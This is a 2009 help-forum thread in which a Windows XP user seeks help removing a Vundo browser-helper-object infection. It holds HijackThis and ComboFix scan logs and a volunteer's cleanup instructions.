View Full Version : Prunnet + BHOs = My computer is suffering - Help!
drrchrds
2009-02-07, 08:16
How it started:
McAfee warned me that some file (I forget what it was called) was requesting internet access, I googled the file name, it was a "normal windows file" so i said OK. Then another warning, this time it was ping.exe, again, normal, but I said NO, because it seemed odd that all the sudden these would need to ask. Then again, Prunnet.exe, I googled it, BAD NEWS! Denied it. I though I had it beat. Nope...
Description of current problem:
Now I have several things going on: Upon startup I have the message "Found New Hardware: Ethernet Controller",
I have browser re-directs in Firefox (haven't tried IE),
I have had one full screen pop up that was ie when ie wasn't running.
I have a constant message: "Generic Host Process for Win32 Services encountered a problem and needed to close"
and lastly, after about 20 mins or so, I get a message that something like NT AUTHORITY/?? is shutting down the computer in 50 seconds or what have you. I don't recall the exact message.
Additional Notes:
generally, things are running poorly and crashing. I tried to run Malwarebytes, but a shut down occurred during the scan. I don't know if it helped or not at this point.
I shut down teatimer and unplugged that ethernet cable (note: the found hardware message was already happening before I did that).
The following log was made after all the above. I hope you can help me, thank you:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:42:17 AM, on 2/7/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\EloSrvce.exe
C:\Program Files\LogMeIn\x86\RaMaint.exe
C:\Program Files\LogMeIn\x86\LogMeIn.exe
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\Program Files\Microsoft LifeCam\MSCamS32.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\pctspk.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\svchost.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\system32\UAService7.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\WINDOWS\system32\EloDkMon.exe
C:\WINDOWS\system32\EloTTray.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = I love Katie ; -) From David
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: (no name) - {05C844A9-D000-45C3-971F-F7909E4E75AB} - C:\WINDOWS\system32\khfEWNhi.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: McAfee Phishing Filter - {27B4851A-3207-45A2-B947-BE8AFE6163AB} - c:\PROGRA~1\mcafee\msk\mskapbho.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {6D794CB4-C7CD-4c6f-BFDC-9B77AFBDC02C} - C:\WINDOWS\system32\ssqqpQkH.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Program Files\McAfee\VirusScan\scriptsn.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O4 - HKLM\..\Run: [mcagent_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [nForce Tray Options] sstray.exe /r
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [] C:\Program Files\EloTouchSystems\EloTTray.exe
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - HKLM\..\Policies\Explorer\Run: [application] C:\Program Files\AKProg\AKProg.exe hs
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O4 - Global Startup: Acrobat Assistant.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.exe.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.lnk.disabled
O4 - Global Startup: Adobe Reader Speed Launch.lnk.disabled
O4 - Global Startup: Device Detector 2.lnk.disabled
O4 - Global Startup: HP Digital Imaging Monitor.lnk.disabled
O4 - Global Startup: Microsoft Office.lnk.disabled
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk.disabled
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Share in Hello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra 'Tools' menuitem: Share in H&ello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {474F00F5-3853-492C-AC3A-476512BBC336} (UploadListView Class) - http://picasaweb.google.com/s/v/19.13/uploader2.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/suite/yautocomplete.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.mcafee.com/molbin/shared/mcgdmgr/1,0,0,26/mcgdmgr.cab
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O20 - Winlogon Notify: ssqqpQkH - C:\WINDOWS\SYSTEM32\ssqqpQkH.dll
O23 - Service: McAfee Application Installer Cleanup (0171901233147914) (0171901233147914mcinstcleanup) - Unknown owner - C:\WINDOWS\TEMP\017190~1.EXE (file missing)
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: EloSystemService - Elo Touchsystems, Inc. - C:\WINDOWS\system32\EloSrvce.exe
O23 - Service: Google Desktop Manager 5.7.806.10245 (GoogleDesktopManager-061008-081103) - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINDOWS\system32\LEXBCES.EXE
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
O23 - Service: MBackMonitor - McAfee - C:\Program Files\McAfee\MBK\MBackMonitor.exe
O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\program files\common files\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PCTEL Speaker Phone (Pctspk) - PCtel, Inc. - C:\WINDOWS\system32\pctspk.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe
--
End of file - 11879 bytes
I am not getting any replies so I am going to try something. I have an idea of what needs to be deleted: there are two dlls in system32 that were created at the same time as prunnet.exe and I can not delete them with any tool tried yet. So I am planning to pop out my HD and pop it into another computer, as a secondary drive, then go in and erase them. Presumably, if the OS is using the C drive, these DLLs will no longer reside on the C drive in another comp so the files will not be being used by another program and therefore should be deletable. Does anyone know if this will work? Or am I just infecting another innocent computer! :crazy:
Hello and welcome to Safer Networking.
My name is peku006 and I will be helping you to remove any infection(s) that you may have.
I will be giving you a series of instructions that need to be followed in the order in which I give them to you.
Please observe these rules while we work:
If you don't know, stop and ask! Don't keep going on.
Please reply to this thread. Do not start a new topic.
Please continue to respond until I give you the "All Clear"
If you follow these instructions, everything should go smoothly.
1 - Scan With ComboFix
We will begin with ComboFix.exe. Please visit this webpage for download links, and instructions for running the tool:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix
* Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
How to Temporarily Disable Anti-virus (http://www.bleepingcomputer.com/forums/topic114351.html)
Please include the C:\ComboFix.txt in your next reply for further review.
2 - Run Hijackthis
Click on the Do a system scan and save a logfile button. It will scan and the log should open in notepad
3 - Status Check
Please reply with
1. the ComboFix log(C:\ComboFix.txt)
2. a fresh HijackThis log
Thanks peku006
drrchrds
2009-02-11, 05:37
Thank you for the help!
Just so you know, before I received your reply I ran MalwareBytes in both normal and safe mode. It found a number of problems, mostly Trojan.Vundo.h . Even though Malwarebytes now says i am clean, I still have almost constant browser redirects when I click on search results.
As directed, I ran combo and hijack, here are my logs.
ComboFix 09-02-10.01 - David 2009-02-10 22:53:35.1 - NTFSx86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.2047.1532 [GMT -5:00]
Running from: c:\documents and settings\David\Desktop\Malware Detection\ComboFix.exe
AV: Avira AntiVir PersonalEdition *On-access scanning disabled* (Updated)
AV: McAfee VirusScan *On-access scanning disabled* (Updated)
FW: McAfee Personal Firewall *disabled*
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
c:\program files\MorpheusBar\bar\1.bin\M0PLUGIN.DLL
c:\program files\MorpheusBar\bar\1.bin\M0POPSWT.DLL
c:\program files\MorpheusBar\bar\1.bin\NPMORPBR.DLL
c:\program files\Mozilla Firefox\plugins\NPMorpBr.dll
c:\windows\system32\winlogon2.exe
c:\windows\Tasks\vryroguf.job
.
((((((((((((((((((((((((( Files Created from 2009-01-11 to 2009-02-11 )))))))))))))))))))))))))))))))
.
2100-02-23 14:35 . 2001-02-22 09:54 768 --a------ c:\program files\x73_lut.dat
2100-02-08 15:03 . 2001-05-11 10:39 53,248 --a------ c:\program files\ACMonitor_X73.exe
2009-02-10 19:46 . 2009-02-10 19:46 <DIR> d-------- c:\program files\Avira
2009-02-10 19:46 . 2009-02-10 19:46 <DIR> d-------- c:\documents and settings\All Users\Application Data\Avira
2009-02-10 19:37 . 2009-02-10 19:38 <DIR> d-------- c:\program files\SpywareBlaster
2009-02-10 19:37 . 2009-02-10 22:39 <DIR> d-a------ c:\documents and settings\All Users\Application Data\TEMP
2009-02-09 15:03 . 2009-02-09 15:03 <DIR> d-------- c:\documents and settings\Mrs. Richards\Application Data\Malwarebytes
2009-02-08 10:56 . 2009-02-10 21:45 <DIR> d-------- c:\documents and settings\All Users\Application Data\Google Updater
2009-02-08 02:16 . 2009-02-10 19:37 <DIR> d-------- c:\program files\Common Files\Wise Installation Wizard
2009-02-08 01:29 . 2009-02-08 01:29 61,440 --a------ c:\windows\system32\drivers\oueg.sys
2009-02-07 22:01 . 2009-02-07 22:01 <DIR> d-------- c:\documents and settings\Administrator\Application Data\Malwarebytes
2009-02-07 01:48 . 2009-02-07 01:49 <DIR> d-------- c:\program files\ERUNT
2009-02-07 01:05 . 2009-02-07 01:05 <DIR> d-------- c:\program files\Malwarebytes' Anti-Malware
2009-02-07 01:05 . 2009-02-07 01:05 <DIR> d-------- c:\documents and settings\David\Application Data\Malwarebytes
2009-02-07 01:05 . 2009-02-07 01:05 <DIR> d-------- c:\documents and settings\All Users\Application Data\Malwarebytes
2009-02-07 01:05 . 2009-01-14 16:11 38,496 --a------ c:\windows\system32\drivers\mbamswissarmy.sys
2009-02-07 01:05 . 2009-01-14 16:11 15,504 --a------ c:\windows\system32\drivers\mbam.sys
2009-02-07 01:00 . 2009-02-07 01:00 <DIR> d-------- c:\program files\Trend Micro
2009-02-06 19:19 . 2009-02-06 19:20 <DIR> d-------- c:\windows\system32\DLLs Removed 2-6-2009
2009-02-04 22:23 . 2009-02-05 01:57 <DIR> d-------- c:\windows\system32\delete this crap
2009-02-04 21:57 . 2009-02-08 13:13 2,204 --a------ c:\windows\kgunefqc
2009-01-31 20:39 . 2009-01-31 21:04 <DIR> d-------- C:\xampp
2009-01-21 02:10 . 2009-01-21 02:10 268 --ah----- C:\sqmdata15.sqm
2009-01-21 02:10 . 2009-01-21 02:10 244 --ah----- C:\sqmnoopt15.sqm
2009-01-13 17:24 . 2009-01-13 17:24 268 --ah----- C:\sqmdata14.sqm
2009-01-13 17:24 . 2009-01-13 17:24 244 --ah----- C:\sqmnoopt14.sqm
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-02-11 04:07 --------- d-----w c:\documents and settings\David\Application Data\OpenOffice.org2
2009-02-11 02:46 --------- d-----w c:\program files\Real
2009-02-11 02:46 --------- d-----w c:\program files\Common Files\Real
2009-02-11 02:28 --------- d-----w c:\program files\Google
2009-02-11 01:11 --------- d-----w c:\program files\Opera
2009-02-10 07:59 --------- d-----w c:\program files\LogMeIn
2009-02-09 20:15 499,712 ----a-w c:\windows\system32\msvcp71.dll
2009-02-09 20:15 348,160 ----a-w c:\windows\system32\msvcr71.dll
2009-02-09 20:07 --------- d-----w c:\program files\Picasa2
2009-02-08 14:40 --------- d-----w c:\documents and settings\LocalService\Application Data\SACore
2009-02-08 06:29 636 ----a-w c:\program files\ombk.txt
2009-02-08 05:30 85,120 ----a-w c:\documents and settings\David\Application Data\GDIPFONTCACHEV1.DAT
2009-02-05 02:34 --------- d-----w c:\program files\CCleaner
2009-02-02 05:17 --------- d-----w c:\program files\McAfee
2009-01-31 05:13 85,120 ----a-w c:\documents and settings\Mrs. Richards\Application Data\GDIPFONTCACHEV1.DAT
2009-01-22 21:37 --------- d-----w c:\documents and settings\Mrs. Richards\Application Data\ZoomBrowser EX
2009-01-22 21:36 --------- d-----w c:\documents and settings\Mrs. Richards\Application Data\CameraWindowDC
2009-01-17 17:09 --------- d-----w c:\documents and settings\Mrs. Richards\Application Data\WebAssist
2009-01-08 15:59 --------- d-----w c:\documents and settings\All Users\Application Data\Microsoft Help
2008-12-31 07:20 --------- d-----w c:\documents and settings\David\Application Data\ZoomBrowser EX
2008-12-31 07:20 --------- d-----w c:\documents and settings\David\Application Data\CameraWindowDC
2008-12-11 10:57 333,952 ----a-w c:\windows\system32\drivers\srv.sys
2008-09-18 20:27 5,632 --sha-w c:\program files\Thumbs.db
2008-01-15 16:53 79,648 ----a-w c:\documents and settings\Katherine\Application Data\GDIPFONTCACHEV1.DAT
2001-07-26 21:58 47 ----a-w c:\program files\ACMonitor_X73.ini
2001-07-05 17:46 8,116 ----a-w c:\program files\OSLO3071b2.USB
2001-06-12 19:28 8,154 ----a-w c:\program files\OsloD3069.usb
2001-05-08 20:36 114,688 ----a-w c:\program files\lxarscan.dll
2001-04-23 19:22 1,437 ----a-w c:\program files\gtx73.ini
2008-06-19 09:16 118,784 ----a-w c:\program files\mozilla firefox\plugins\MyCamera.dll
2007-05-23 00:14 8,784 ----a-w c:\program files\mozilla firefox\plugins\ractrlkeyhook.dll
2007-05-23 00:17 245,408 ----a-w c:\program files\mozilla firefox\plugins\unicows.dll
2009-02-11 02:43 122,880 ----a-w c:\program files\mozilla firefox\components\GoogleDesktopMozilla.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"googletalk"="c:\program files\Google\Google Talk\googletalk.exe" [2007-01-01 3739648]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2008-04-13 15360]
"Google Update"="c:\documents and settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" [2008-09-02 133104]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UserFaultCheck"="c:\windows\system32\dumprep 0 -u" [X]
"mcagent_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2008-07-11 641208]
"LogMeIn GUI"="c:\program files\LogMeIn\x86\LogMeInSystray.exe" [2007-08-03 63048]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2008-05-02 13529088]
"Google Desktop Search"="c:\program files\Google\Google Desktop Search\GoogleDesktop.exe" [2009-02-10 30192]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2008-05-02 86016]
"avgnt"="c:\program files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" [2008-06-12 266497]
"nwiz"="nwiz.exe" [2008-05-02 c:\windows\system32\nwiz.exe]
"nForce Tray Options"="sstray.exe" [2003-10-23 c:\windows\system32\sstray.exe]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"="Narrator.exe" [2008-04-13 c:\windows\system32\narrator.exe]
c:\documents and settings\Ellie\Start Menu\Programs\Startup\
OneNote 2007 Screen Clipper and Launcher.lnk - c:\program files\Microsoft Office\Office12\ONENOTEM.EXE [2007-12-07 101440]
c:\documents and settings\Katherine\Start Menu\Programs\Startup\
OneNote 2007 Screen Clipper and Launcher.lnk - c:\program files\Microsoft Office\Office12\ONENOTEM.EXE [2007-12-07 101440]
c:\documents and settings\Mrs. Richards\Start Menu\Programs\Startup\
OneNote 2007 Screen Clipper and Launcher.lnk - c:\program files\Microsoft Office\Office12\ONENOTEM.EXE [2007-12-07 101440]
c:\documents and settings\David\Start Menu\Programs\Startup\
ERUNT AutoBackup.lnk - c:\program files\ERUNT\AUTOBACK.EXE [2005-10-20 38912]
OneNote 2007 Screen Clipper and Launcher.lnk - c:\program files\Microsoft Office\Office12\ONENOTEM.EXE [2007-12-07 101440]
OpenOffice.org 2.4.lnk - c:\program files\OpenOffice.org 2.4\program\quickstart.exe [2008-01-21 393216]
c:\documents and settings\All Users\Start Menu\Programs\Startup\
Acrobat Assistant.lnk.disabled [2004-07-30 910]
Adobe Gamma Loader.exe.lnk.disabled [2004-08-02 890]
Adobe Gamma Loader.lnk.disabled [2004-07-30 890]
Adobe Reader Speed Launch.lnk.disabled [2007-03-31 1757]
Device Detector 2.lnk.disabled [2004-11-17 1650]
Device Detector 3.lnk - c:\program files\Olympus\DeviceDetector\DevDtct2.exe [2004-11-17 118784]
HP Digital Imaging Monitor.lnk.disabled [2006-12-05 1808]
Microsoft Office.lnk.disabled [2004-08-04 1730]
Microsoft Works Calendar Reminders.lnk.disabled [2004-07-25 875]
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\LMIinit]
2008-10-17 14:07 87352 c:\windows\system32\LMIinit.dll
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"vidc.iv31"= c:\windows\system32\ir32_32.dll
"vidc.iv32"= c:\windows\system32\ir32_32.dll
"vidc.ir41"= c:\windows\System32\ir41_32.ax
"VIDC.SP53"= SP5X_32.DLL
"VIDC.SP54"= SP5X_32.DLL
"VIDC.SP55"= SP5X_32.DLL
"VIDC.SP56"= SP5X_32.DLL
"VIDC.SP57"= SP5X_32.DLL
"VIDC.SP58"= SP5X_32.DLL
"VIDC.SP59"= SP5X_32.DLL
"midi1"= KORGUMDD.DRV
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AloPort.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Parallel Arbitrator]
@="Driver Group"
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
"MoneyAgent"="c:\program files\Microsoft Money\System\Money Express.exe"
"ATI Launchpad"=
"Yahoo! Pager"=c:\program files\Yahoo!\Messenger\ypager.exe -quiet
"WebCamRT.exe"=
"ctfmon.exe"=c:\windows\system32\ctfmon.exe
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"InCD"=c:\program files\Ahead\InCD\InCD.exe
"NeroCheck"=c:\windows\system32\NeroCheck.exe
"SunJavaUpdateSched"="c:\program files\Java\jre1.6.0_05\bin\jusched.exe"
"PrinTray"=c:\windows\System32\spool\DRIVERS\W32X86\3\printray.exe
"TkBellExe"="c:\program files\Common Files\Real\Update_OB\realsched.exe" -osboot
"HPDJ Taskbar Utility"=c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe
"{0228e555-4f9c-4e35-a3ec-b109a192b4c2}"=c:\program files\Google\Gmail Notifier\gnotify.exe
"PicasaNet"="c:\program files\Hello\Hello.exe" -b
"QuickTime Task"="c:\program files\QuickTime\qttask.exe" -atboottime
"LogitechGalleryRepair"=c:\program files\Logitech\ImageStudio\ISStart.exe
"LogitechImageStudioTray"=c:\program files\Logitech\ImageStudio\LogiTray.exe
"LVCOMS"=c:\program files\Common Files\Logitech\QCDriver3\LVCOMS.EXE
"tgcmd"="c:\program files\Support.com\BellSouth\hcenter.exe" /starthidden /tgcmdwrapper
"DropBoxUtility"="c:\program files\DropBox\DropBox\DropBox.exe" /s
"NeroFilterCheck"=c:\windows\system32\NeroCheck.exe
"ABIT uGuru"=c:\program files\ABIT\ABIT uGuru\uGuru.exe
"HydraVisionDesktopManager"=c:\program files\ATI Technologies\HydraVision\HydraDM.exe
"ATIPTA"=c:\program files\ATI Technologies\ATI Control Panel\atiptaxx.exe
"BJCFD"=c:\program files\BroadJump\Client Foundation\CFD.exe
"HP Software Update"=c:\program files\HP\HP Software Update\HPWuSchd2.exe
"Google Desktop Search"="c:\program files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
"ATICCC"="c:\program files\ATI Technologies\ATI.ACE\CLIStart.exe"
"Adobe Photo Downloader"="c:\program files\Adobe\Photoshop Album Starter Edition\3.2\Apps\apdproxy.exe"
"Picasa Media Detector"=c:\program files\Picasa2\PicasaMediaDetector.exe
